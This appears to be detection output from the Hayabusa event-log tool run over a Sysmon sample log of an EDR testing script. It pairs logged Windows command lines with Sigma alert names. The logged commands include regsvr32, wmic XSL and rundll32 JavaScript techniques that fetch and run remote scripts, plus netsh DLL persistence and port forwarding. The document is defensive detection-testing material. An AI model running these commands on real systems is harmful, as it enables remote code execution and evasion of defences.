Anomaly,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_regsvr32_anomalies.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:45.581 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: regsvr32.exe /s /u /i:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Cmstp_calc.sct scrobj.dll | LID: 0x413182 | PID: 208 | PGUID: 747F3D96-6639-5D3F-0000-001074F48900",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:46.095 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49829 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\regsvr32.exe | PID: 4288 | PGUID: 
747F3D96-6638-5D3F-0000-001067BA8900,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:46.095 +09:00,MSEDGEWIN10,3,high,Exec | Evas,Regsvr32 Network Activity,,../hayabusa-rules/sigma/network_connection/sysmon_regsvr32_network_activity.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:49.340 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Windows\System32\xxxFile.csproj | Process: C:\Windows\System32\cmd.exe | PID: 1208 | PGUID: 747F3D96-6609-5D3F-0000-00109FBF8500,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3240 | PGUID: 747F3D96-663D-5D3F-0000-00106F608A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:49.748 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:49.889 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4184 | PGUID: 
747F3D96-663D-5D3F-0000-001074658A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c C:\Windows\Microsoft.Net\Framework\v4.0.30319\MSBuild.exe xxxFile.csproj | LID: 0x413182 | PID: 5340 | PGUID: 747F3D96-663D-5D3F-0000-001062708A00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:50.104 +09:00,MSEDGEWIN10,1,low,Evas,Possible Applocker Bypass,,../hayabusa-rules/sigma/process_creation/proc_creation_win_possible_applocker_bypass.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:53.776 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4260 | PGUID: 747F3D96-6641-5D3F-0000-0010A38C8A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:53.843 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1516 | PGUID: 
747F3D96-6641-5D3F-0000-001066918A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | Process: C:\Windows\System32\wbem\WMIC.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | LID: 0x413182 | PID: 4896 | PGUID: 747F3D96-6642-5D3F-0000-0010F69D8A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,Evas | Exec,SquiblyTwo,,../hayabusa-rules/sigma/process_creation/proc_creation_win_bypass_squiblytwo.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,Exec,Suspicious WMI Reconnaissance,,../hayabusa-rules/sigma/process_creation/proc_creation_win_wmic_reconnaissance.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:54.246 +09:00,MSEDGEWIN10,1,medium,Evas,XSL Script Processing,,../hayabusa-rules/sigma/process_creation/proc_creation_win_xsl_script_processing.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:54.630 +09:00,MSEDGEWIN10,11,info,,File Created,Path: C:\Users\IEUser\AppData\Local\Microsoft\Windows\INetCache\IE\LQ86GWLO\Wmic_calc[1].xsl | Process: C:\Windows\System32\Wbem\WMIC.exe | PID: 4896 | PGUID: 
747F3D96-6642-5D3F-0000-0010F69D8A00,../hayabusa-rules/hayabusa/sysmon/events/11_FileCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:54.630 +09:00,MSEDGEWIN10,11,high,,Windows Shell File Write to Suspicious Folder,,../hayabusa-rules/sigma/file_event/file_event_win_shell_write_susp_directory.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:54.718 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: wmic process get brief /format:""https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/Wmic_calc.xsl"" | LID: 0x413182 | PID: 5728 | PGUID: 747F3D96-6642-5D3F-0000-0010D6C98A00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:56.665 +09:00,MSEDGEWIN10,3,medium,,Network Connection_Sysmon Alert,Suspicious NetCon | tcp | Src: 10.0.2.15:49830 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\wbem\WMIC.exe | PID: 4896 | PGUID: 747F3D96-6642-5D3F-0000-0010F69D8A00,../hayabusa-rules/hayabusa/sysmon/alerts/3_NetworkConnection_SysmonAlert.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5084 | PGUID: 
747F3D96-6646-5D3F-0000-0010E32E8B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:58.256 +09:00,MSEDGEWIN10,1,medium,Disc | CredAccess,Capture a Network Trace with netsh.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:58.286 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace show status | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 4148 | PGUID: 747F3D96-6646-5D3F-0000-0010A7318B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:58.485 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh.exe add helper AllTheThings.dll | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3824 | PGUID: 747F3D96-6646-5D3F-0000-001051388B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:58.543 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6760 | PGUID: 
747F3D96-6646-5D3F-0000-001029398B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:58.598 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 3868 | PGUID: 747F3D96-6646-5D3F-0000-0010A7398B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:33:58.683 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c netsh trace stop | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6232 | PGUID: 747F3D96-6646-5D3F-0000-0010913A8B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:00.330 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace show status | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh trace show status | LID: 0x413182 | PID: 5760 | PGUID: 747F3D96-6647-5D3F-0000-0010F4648B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh trace start capture=yes filemode=append 
persistent=yes tracefile=trace.etl | LID: 0x413182 | PID: 5056 | PGUID: 747F3D96-6647-5D3F-0000-0010AE6E8B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:00.420 +09:00,MSEDGEWIN10,1,medium,Disc | CredAccess,Capture a Network Trace with netsh.exe,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_packet_capture.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:00.434 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh trace stop | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh trace stop | LID: 0x413182 | PID: 4568 | PGUID: 747F3D96-6647-5D3F-0000-001005738B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh interface portproxy delete v4tov4 listenport=8080 listenaddress=0.0.0.0 | LID: 0x413182 | PID: 5048 | PGUID: 747F3D96-6647-5D3F-0000-001065758B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:00.442 +09:00,MSEDGEWIN10,1,medium,LatMov | Evas | C2,Netsh Port Forwarding,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 
connectport=8000 connectaddress=192.168.1.1 | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh interface portproxy add v4tov4 listenport=8080 listenaddress=0.0.0.0 connectport=8000 connectaddress=192.168.1.1 | LID: 0x413182 | PID: 4028 | PGUID: 747F3D96-6647-5D3F-0000-001057768B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:00.460 +09:00,MSEDGEWIN10,1,medium,LatMov | Evas | C2,Netsh Port Forwarding,,../hayabusa-rules/sigma/process_creation/proc_creation_win_netsh_port_fwd.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: netsh.exe add helper AllTheThings.dll | Process: C:\Windows\System32\netsh.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c netsh.exe add helper AllTheThings.dll | LID: 0x413182 | PID: 5236 | PGUID: 747F3D96-6647-5D3F-0000-0010927C8B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:00.466 +09:00,MSEDGEWIN10,1,high,PrivEsc,Suspicious Netsh DLL Persistence,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_netsh_dll_persistence.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:00.731 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\System32\svchost.exe -k netsvcs -p -s NetSetupSvc | Process: C:\Windows\System32\svchost.exe | User: NT AUTHORITY\SYSTEM | Parent Cmd: C:\Windows\system32\services.exe | LID: 0x3e7 | PID: 5376 | PGUID: 
747F3D96-6647-5D3F-0000-001052998B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:00.970 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5256 | PGUID: 747F3D96-6648-5D3F-0000-0010B9AB8B00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:01.090 +09:00,MSEDGEWIN10,1,info,,Process Created,Cmd: C:\Windows\system32\dispdiag.exe -out dispdiag_start.dat | Process: C:\Windows\System32\dispdiag.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: netsh trace start capture=yes filemode=append persistent=yes tracefile=trace.etl | LID: 0x413182 | PID: 3704 | PGUID: 747F3D96-6648-5D3F-0000-001092BB8B00,../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:05.237 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6836 | PGUID: 747F3D96-664D-5D3F-0000-0010F1498C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:05.252 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 6056 
| PGUID: 747F3D96-664D-5D3F-0000-0010114D8C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:05.502 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32 AllTheThings.dll,EntryPoint | LID: 0x413182 | PID: 912 | PGUID: 747F3D96-664D-5D3F-0000-00108D5B8C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:05.542 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32 AllTheThings.dll,EntryPoint | Process: C:\Windows\SysWOW64\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32 AllTheThings.dll,EntryPoint | LID: 0x413182 | PID: 5572 | PGUID: 747F3D96-664D-5D3F-0000-0010BB5D8C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5844 | PGUID: 747F3D96-6652-5D3F-0000-0010B9708C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,high,Evas,Rundll32 JS RunHTMLApplication 
Pattern,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:10.373 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:10.388 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: timeout 5 | Process: C:\Windows\System32\timeout.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 5268 | PGUID: 747F3D96-6652-5D3F-0000-001059728C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | Process: C:\Windows\System32\rundll32.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | LID: 0x413182 | PID: 348 | PGUID: 747F3D96-6652-5D3F-0000-001058828C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,high,Evas,Rundll32 JS RunHTMLApplication 
Pattern,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_js_runhtmlapplication.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,medium,Evas,Suspicious Rundll32 Script in CommandLine,,../hayabusa-rules/sigma/process_creation/proc_creation_win_susp_rundll32_script_run.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:10.708 +09:00,MSEDGEWIN10,1,high,,Application Executed Non-Executable Extension,,../hayabusa-rules/sigma/process_creation/proc_creation_win_run_executable_invalid_extension.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:11.501 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: ""C:\Windows\System32\calc.exe"" | Process: C:\Windows\System32\calc.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();GetObject(""script:https://raw.githubusercontent.com/op7ic/EDR-Testing-Script/master/Payloads/test"") | LID: 0x413182 | PID: 4888 | PGUID: 747F3D96-6653-5D3F-0000-001083BC8C00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:12.352 +09:00,MSEDGEWIN10,3,info,,Network Connection,tcp | Src: 10.0.2.15:49831 (MSEDGEWIN10.home) | Dst: 151.101.0.133:443 () | User: MSEDGEWIN10\IEUser | Process: C:\Windows\System32\rundll32.exe | PID: 348 | PGUID: 747F3D96-6652-5D3F-0000-001058828C00,../hayabusa-rules/hayabusa/sysmon/events/3_NetworkConnection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:12.352 +09:00,MSEDGEWIN10,3,medium,Evas | Exec,Rundll32 Internet 
Connection,,../hayabusa-rules/sigma/network_connection/sysmon_rundll32_net_connections.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:15.226 +09:00,MSEDGEWIN10,1,info,,Process Created,"Cmd: cmd /c rundll32.exe javascript:""\..\mshtml,RunHTMLApplication "";document.write();h=new0ActiveXObject(""WScript.Shell"").run(""calc.exe"",0,true);try{h.Send();b=h.ResponseText;eval(b);}catch(e){new0ActiveXObject(""WScript.Shell"").Run(""cmd /c taskkill /f /im rundll32.exe && exit"",0,true);} | Process: C:\Windows\System32\cmd.exe | User: MSEDGEWIN10\IEUser | Parent Cmd: ""C:\Windows\System32\cmd.exe"" /C ""C:\ProgramData\ssh\runtests.bat"" | LID: 0x413182 | PID: 1808 | PGUID: 747F3D96-6657-5D3F-0000-001029198D00",../hayabusa-rules/hayabusa/sysmon/events/1_ProcessCreated.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/AutomatedTestingTools/panache_sysmon_vs_EDRTestingScript.evtx 2019-07-30 06:34:15.226 